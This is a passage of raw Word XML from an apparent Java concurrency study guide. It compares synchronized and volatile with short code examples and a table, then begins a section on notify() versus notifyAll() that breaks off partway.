    </w:p>
    <w:p w14:paraId="672807F0"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Implementing thread-safe counters or incrementing shared data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C579DA"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3E056BF"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A flag variable that signals threads to stop execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7157306F"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4. Locking and Synchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EA16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7655054"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Uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lock</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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7DAC2443"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Does </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not use locks</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It simply ensures that the latest value of a variable is visible to all threads without synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF82091"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5. Atomicity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0628D3"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05911CC"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Guarante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of code inside the synchronized block. It ensures that the code is executed completely without interruption by other threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240CB5B9"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16A4425E"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Does not guarantee atomicity</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for compound actions (like i++, which involves reading, modifying, and writing the value). It only guarantees that the variable’s value is updated in memory and visible to other threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3692C08E"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6. Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F1C81A"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4964FFB"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Higher overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to acquiring and releasing locks. Synchronization can block threads, leading to potential performance degradation when multiple threads contend for the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45873569"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6F18E644"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Lower overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it does not involve locking. However, it only provides visibility guarantees, and using it for compound operations can still lead to issues like race conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2946B8D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7. Example Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192DC695" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronized Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C27F7A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Counter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7453A97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4899FD9F" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56A3951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ynchronized method to ensure only one thread can modify 'count' at a time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9BE63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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DB37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6BFF38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929650C" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04163F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int getCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648FBA1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count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E1F5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F92C7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CFD2BBC" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67838CC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3CBCCB6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public static void main(String[] args) throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D49D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 counter = new Counter();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B9FB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2DEDCA5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67899D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2BB1A6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94BFE4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3666B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1B29284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4FA403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5F7D9E4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12EA5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583617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3C3F4CB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36F596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join();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C4C7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join();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35380D8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inal count: " + counter.getCount()); // Should be 2000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426B896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282DEF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61B0FD40" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>volatile Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF077A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Flag {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2C62F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volatile boolean flag = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADCA6BE" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF5B6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void setFlagTrue() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36596B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 true;  // Changes the value of the flag to true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F737C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C760181" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46247AE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boolean isFlagSet() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008C670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flag;  // Returns the latest value of the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255979B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49E68B2" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C2361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74602B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flag = new Flag();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287F985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203764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19DE531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imulating some operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01279C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setFlagTrue();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A655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33B638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51B3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69D1CE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flag.isFlagSet()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E202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Wait until flag is true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6982259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0EA0B3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lag is set!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBC4D1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BE7241B" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D6100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2D531BA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859647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FC79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34841E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4166"/>
        <w:gridCol w:w="4070"/>
      </w:tblGrid>
      <w:tr w:rsidR="00891EBF" w:rsidRPr="005C2C08" w14:paraId="4DD29D3D" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0614D2D3"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67E899F5"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ynchronized</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61672A6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volatile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00891EBF" w:rsidRPr="005C2C08" w14:paraId="4F497624" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23E7159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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7334E37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for thread safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F06B4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Ensures visibility of variable changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00891EBF" w:rsidRPr="005C2C08" w14:paraId="43FD7869" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="504612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hread Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B4666C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and atomicity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46E115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visibility but no atomicity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00891EBF" w:rsidRPr="005C2C08" w14:paraId="7FBC6716" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E01360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Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F8180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critical sections and synchronized methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6626F61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flags or state variables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00891EBF" w:rsidRPr="005C2C08" w14:paraId="2D768A85" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79CBABC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Locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="158ADE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Uses locks to prevent concurrent access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B894DB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use locks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00891EBF" w:rsidRPr="005C2C08" w14:paraId="025AF956" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37ACD6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Atomicity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CAEB4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Guarantees atomicity of code inside synchronized blocks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="553F8E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guarantee atomicity for compound operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00891EBF" w:rsidRPr="005C2C08" w14:paraId="7B6A107F" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="771C068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erformance Overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09340C7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Higher due to lock acquisition and blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CCE24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Lower, no locking involved</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00891EBF" w:rsidRPr="005C2C08" w14:paraId="2089F5FA" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F07D7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ypical Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AF2142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Synchronized methods for shared resources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13FB08B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Visibility of shared variables, flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67AE32B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20DC677B" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use synchronized when you need mutual exclusion, ensuring that only one thread can access a critical section of code at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427A9AB9" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00CE4B95" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use volatile when you need to ensure that a variable's latest value is visible to all threads, but it doesn't provide mutual exclusion. It is useful for flags or state variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A23262" w14:textId="44021A1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8" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="313DE1C6" w14:textId="5E27C87A" w:rsidR="00C836C6" w:rsidRPr="00CE4B95" w:rsidRDefault="00C836C6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="275" w:name="_Toc197867489"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What happens </w:t>
      </w:r>
      <w:r w:rsidR="00B215E7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">if a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>thread call</w:t>
      </w:r>
      <w:r w:rsidR="00B215E7"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 notify() instead of notifyAll()?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="275"/>
    </w:p>
    <w:p w14:paraId="1F4B1D40" w14:textId="372B802C" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="005C2C08"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In</w:t>
      </w:r>
      <w:r w:rsidR="00891EBF" w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">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Key Differences Between notify() and notifyAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5A81CB"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w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E323FE1"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one</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread that is waiting on the object’s monitor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C993BF"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Which thread gets awakened is </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not guaranteed</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and depends on the thread scheduling of the JVM. It could be any thread that is currently in the waiting state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1835EDB7"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If multiple threads are waiting, only one thread is notified, and the others will continue waiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ED4B76"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All()</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1574E0BC"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all</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> threads that are waiting on the object’s monitor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDE513B"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Once all the threads are notified, they will compete for the monitor lock and execute as the JVM allows. This is typically used when all waiting threads need to be processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDF2278"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What Happens If a Thread Calls notify() Instead of notifyAll()?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613A2D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When a thread calls notify() instead of notifyAll(), it can result in </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unexpected or inefficient behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, especially in cases where multiple threads are waiting for a condition to be met. Here's what could happen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFE29B7"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Potential Starvation</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24930E5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 xml:space="preserve">This can lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>starvation</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of certain threads (i.e., threads may never get a chance to run).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C190691"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correct Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
